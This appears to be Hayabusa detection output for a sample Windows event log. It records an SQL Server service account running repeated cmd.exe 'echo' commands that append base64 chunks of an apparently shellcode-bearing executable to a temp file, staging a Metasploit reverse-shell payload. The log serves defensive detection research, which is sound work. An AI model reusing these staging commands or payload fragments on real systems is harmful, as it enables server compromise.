iaiF/n9STwRu23MqYU4Ex0UI6QBwAFHob5//S4PEBIU9dT18Rh2LPdTBQADu1Qhq9QpoBhAAAGg4fgBDUP/XcFYEI00dagRRPXHK9gBo//9G5FL/14t9EAteIIl+ITMRX15bXcKUJ5CQkJBVi91Ri0UQM8lDwA+VwYlN/ItNDIP5QNVmXTVtAAAPhKgCYfBJg/kPzg4AAwAEcdIZkaKRQQD/JJX41kDWiy2tMgI/TvEP4QKA+XwPM8I7wnQvi04EjYn8apW7am3X//8ALlH/FezBQJCg+NAPikMCrgCLRRCFwCpGOIcODAKJKzgzwF7/5V3CDAAk/YlGM7XAXrHlo8IMW+4hCTPJi1Y4g3IEgPoED80BWK101IsZBDtV/L/ZUmoBaP//AABQ/xW4wUBNg/jCD4ToAZUXi0UQYsCLRjg2DgwEJJA4M8Bei0Jdwgw+JPv0RjgzwF6L5V3CDLSLrwgz0otOOIPhEJ95EA+U>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xb64 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:18.488 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 
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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x3b8 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:18.764 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x9a0 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:19.038 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x132c | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:19.311 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 
4gBqAP//3/4CfW6hYAbjAIXAdTlQaNcBQQBQlwQN+pWjYAZnAOsfg/4BwjehXBZYAIV7dQVQaPgAQQBQ6FMNqQCjXAbrAKplDIVodA6LVQyNFwhRUv/Qi/DrC2oB/9Mz9qYSOnUMg/7SdQr/FZjAQKqFwJoai00IM5ALxjPSiW4wi0cEZsqAzAKJTzSJygTRRwTvdRD30CzGX/f6G8Beg3gRAQDti+WSw5CQkJCQkJCQkAyQUYuji0V2UP/9TcBAADOpXcOQkZCQkJDgkJCQkIhokJBVi+yDYehTM8CwV4stDIlF7IlF8IvHM9slAEdAAIldW4ldCYld6IlFZHRNOR2EBkEAdUVohAZBAFNTU/RTcd9TjU30agFRiF1FyV31iOL2iF33iF34xsf5Af8VCMBAAIXAxQ+9gEZAAOg/GAAAg8QE6waJHYQG9AA9dQjjxwAAEAB0b/dG/wAAAQB0ZthIBtEAi1YmO7fHReq0AAAAibrJFh1TaIwBQQBqAVwRDAAAKMQMOwej2AbbAL9lhwAAlI1NDI1V4FGKTRBSUf/QRcOQIYtVDGoIUuhEAQDVi04Ig/EIC8iL8wQxAJMQAIlOCIlGBPfHAE4gAA8xgboAAPdG9QAAAgCjeItGFMdF7AIAAACJRfChCgYDADvDdRlTI9UBQQBqsuiWMQAAg8QMO8Oj6QZBAGcajU0MjVXgUYtNUFJR/9DrFGop/xVMwEAAkoGKAdQVIAQ2AOsEO8N/IYu3DGoEUui3AEsAi68IvMQIC8iLRgQNAAAgAIlOCNJGBDld/HRn/OsNquYQz6MV6zfl88G9Iej7AgAAkOsMxX/mP19+fnFSCPH6YInlMdLrDGSgW2TH0nU6re5o1WSLUjDrDPAgnuMi4SLv8nZxt4tSDJCLUhSQ6w8DqYDqQ+21l/u+T3oRnDDrDLxhTda/6H/b0M9po4tyKJDrDWK5NisF9U6iLwJT9woPt0om6wv+48qISP2Poipl+DH/kOsLdiE03/EqaUGzUwaQMcCQ6whggJyCIf/GaqyQPGGQfA+QLCCQ6wlFKUJfx9DR2YOQwc8N6wqIhGwkKJV7M2SSAcfrDxbCE5/MhOUzEEbXvXkhgUl1tpBSkOsIR2j7O96rtQ9XkOsK6OEZYZYtNIb5AYtSEJCLQjyQ6wtvHO6CtppXUZfrwgHQkItAeIXAkA+EtgEAAOsJvBHhi5cnz6vJAdDrD12ZWMG2rWEDmeWRyuaFWlCQi0gYi1ggkOsKWj6NjF2V6/wP7wHTkOsMxs4Ny3WWoZb9DEkykOsPUGhe0FYUivF+muOt2x/jhcmQD4RGAQAAkOsOvZ+yYJE+39wN+IDWXMhJizSLAdaQ6wtQFwEqgj9bn18lTzH/kOsKShDNuj3pWEjOv5DrDij9+3UKqbBF2wGyxXDuMcCQ6w4Cplr2VcWyhpYN5gTVkayQwc8NkOsOIhqtsOiPVxK+FrdCnvQB>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x1084 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:19.583 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 
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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xb44 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:19.857 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x109c | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:20.131 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x870 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:20.404 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x370 | User: Svc-SQL-DB01 | LID: 
0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:20.678 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x13b4 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:20.951 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xcf8 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:21.224 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x824 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell 
(MSF).evtx +2020-08-02 07:58:21.498 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xea0 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:21.772 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xfb0 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:22.047 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x121c | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:22.320 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: 
C:\Windows\System32\cmd.exe | PID: 0xce4 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:22.593 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x20 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:22.867 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xc6c | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:23.140 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 
ZXNlIHJlc3VsdHMgYXJlIHByb2JhYmx5IG5vdCB0aGF0IHJlbGlhYmxlLgoAAAAAAABFUlJPUjogVGhlIG1lZGlhbiBhbmQgbWVhbiBmb3IgdGhlIHdhaXRpbmcgdGltZSBhcmUgbW9yZSB0aGFuIHR3aWNlIHRoZSBzdGFuZGFyZAogICAgICAgZGV2aWF0aW9uIGFwYXJ0LiBUaGVzZSByZXN1bHRzIGFyZSBOT1QgcmVsaWFibGUuCgAAAAAAAABXQVJOSU5HOiBUaGUgbWVkaWFuIGFuZCBtZWFuIGZvciB0aGUgcHJvY2Vzc2luZyB0aW1lIGFyZSBub3Qgd2l0aGluIGEgbm9ybWFsIGRldmlhdGlvbgogICAgICAgIFRoZXNlIHJlc3VsdHMgYXJlIHByb2JhYmx5IG5vdCB0aGF0IHJlbGlhYmxlLgoAAABFUlJPUjogVGhlIG1lZGlhbiBhbmQgbWVhbiBmb3IgdGhlIHByb2Nlc3NpbmcgdGltZSBhcmUgbW9yZSB0aGFuIHR3aWNlIHRoZSBzdGFuZGFyZAogICAgICAgZGV2aWF0aW9uIGFwYXJ0LiBUaGVzZSByZXN1bHRzIGFyZSBOT1QgcmVsaWFibGUuCgAAAABXQVJOSU5HOiBUaGUgbWVkaWFuIGFuZCBtZWFuIGZvciB0aGUgaW5pdGlhbCBjb25uZWN0aW9uIHRpbWUgYXJlIG5vdCB3aXRoaW4gYSBub3JtYWwgZGV2aWF0aW9uCiAgICAgICAgVGhlc2UgcmVzdWx0cyBhcmUgcHJvYmFibHkgbm90IHRoYXQgcmVsaWFibGUuCgAAAEVSUk9SOiBUaGUgbWVkaWFuIGFuZCBtZWFuIGZvciB0aGUgaW5pdGlhbCBjb25uZWN0aW9uIHRpbWUgYXJlIG1vcmUgdGhhbiB0d2ljZSB0aGUgc3RhbmRhcmQKICAgICAgIGRldmlhdGlvbiBhcGFydC4gVGhlc2UgcmVzdWx0cyBhcmUgTk9UIHJlbGlhYmxlLgoAAAAAVG90YWw6ICAgICAgJTVJNjRkICU0STY0ZCAlNS4xZiAlNkk2NGQgJTdJNjRkCgAAV2FpdGluZzogICAgJTVJNjRkICU0STY0ZCAlNS4xZiAlNkk2NGQgJTdJNjRkCgAAUHJvY2Vzc2luZzogJTVJNjRkICU0STY0ZCAlNS4xZiAlNkk2NGQgJTdJNjRkCgAAQ29ubmVjdDogICAgJTVJNjRkICU0STY0ZCAlNS4xZiAlNkk2NGQgJTdJNjRkCgAAICAgICAgICAgICAgICBtaW4gIG1lYW5bKy8tc2RdIG1lZGlhbiAgIG1heAoAAAAACkNvbm5lY3Rpb24gVGltZXMgKG1zKQoAICAgICAgICAgICAgICAgICAgICAgICAgJS4yZiBrYi9zIHRvdGFsCgAAAAAgICAgICAgICAgICAg>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xe64 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:23.414 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 
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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x82c | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:23.687 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xd28 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:23.962 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 
OjwvdGg+PHRkIGNvbHNwYW49MiAlcz4lZDwvdGQ+PC90cj4KAAAAAAA8dHIgJXM+PHRoIGNvbHNwYW49MiAlcz5Db21wbGV0ZSByZXF1ZXN0czo8L3RoPjx0ZCBjb2xzcGFuPTIgJXM+JWQ8L3RkPjwvdHI+CgAAADx0ciAlcz48dGggY29sc3Bhbj0yICVzPlRpbWUgdGFrZW4gZm9yIHRlc3RzOjwvdGg+PHRkIGNvbHNwYW49MiAlcz4lLjNmIHNlY29uZHM8L3RkPjwvdHI+CgAAAAAAADx0ciAlcz48dGggY29sc3Bhbj0yICVzPkNvbmN1cnJlbmN5IExldmVsOjwvdGg+PHRkIGNvbHNwYW49MiAlcz4lZDwvdGQ+PC90cj4KAAAAPHRyICVzPjx0aCBjb2xzcGFuPTIgJXM+RG9jdW1lbnQgTGVuZ3RoOjwvdGg+PHRkIGNvbHNwYW49MiAlcz4ldSBieXRlczwvdGQ+PC90cj4KAAAAAAAAADx0ciAlcz48dGggY29sc3Bhbj0yICVzPkRvY3VtZW50IFBhdGg6PC90aD48dGQgY29sc3Bhbj0yICVzPiVzPC90ZD48L3RyPgoAAAAAAAAAPHRyICVzPjx0aCBjb2xzcGFuPTIgJXM+U2VydmVyIFBvcnQ6PC90aD48dGQgY29sc3Bhbj0yICVzPiVodTwvdGQ+PC90cj4KAAAAAAAAAAA8dHIgJXM+PHRoIGNvbHNwYW49MiAlcz5TZXJ2ZXIgSG9zdG5hbWU6PC90aD48dGQgY29sc3Bhbj0yICVzPiVzPC90ZD48L3RyPgoAAAAAADx0ciAlcz48dGggY29sc3Bhbj0yICVzPlNlcnZlciBTb2Z0d2FyZTo8L3RoPjx0ZCBjb2xzcGFuPTIgJXM+JXM8L3RkPjwvdHI+CgAKCjx0YWJsZSAlcz4KAAAAc29ja2V0IHJlY2VpdmUgYnVmZmVyAAAAc29ja2V0IHNlbmQgYnVmZmVyAABzb2NrZXQgbm9uYmxvY2sAc29ja2V0AABDb21wbGV0ZWQgJWQgcmVxdWVzdHMKAABDb250ZW50LWxlbmd0aDoAQ29udGVudC1MZW5ndGg6AGtlZXAtYWxpdmUAAEtlZXAtQWxpdmUAAExPRzogUmVzcG9uc2UgY29kZSA9ICVzCgAAAABXQVJOSU5HOiBSZXNwb25zZSBjb2RlIG5vdCAyeHggKCVzKQoAAAAANTAwAEhUVFAAAAAAU2VydmVyOgANCg0KAAAAAExPRzogaGVhZGVyIHJlY2VpdmVkOgolcwoAAABhcHJfc29ja2V0X3JlY3YAPC9wPgo8cD4KAAAAIExpY2Vuc2VkIHRvIFRoZSBBcGFjaGUgU29mdHdhcmUgRm91bmRhdGlvbiwgaHR0cDovL3d3dy5hcGFjaGUub3JnLzxicj4KAAAAAAAAAAAgQ29weXJpZ2h0>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x840 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:24.236 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 
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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xe14 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:24.510 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xe74 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:24.790 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x13c4 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:25.064 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x9e8 | User: Svc-SQL-DB01 | LID: 
0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:25.338 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x113c | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:25.618 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x568 | User: Svc-SQL-DB01 | LID: 0x1304385",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-02 07:58:25.896 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x12a4 | User: Svc-SQL-DB01 | LID: 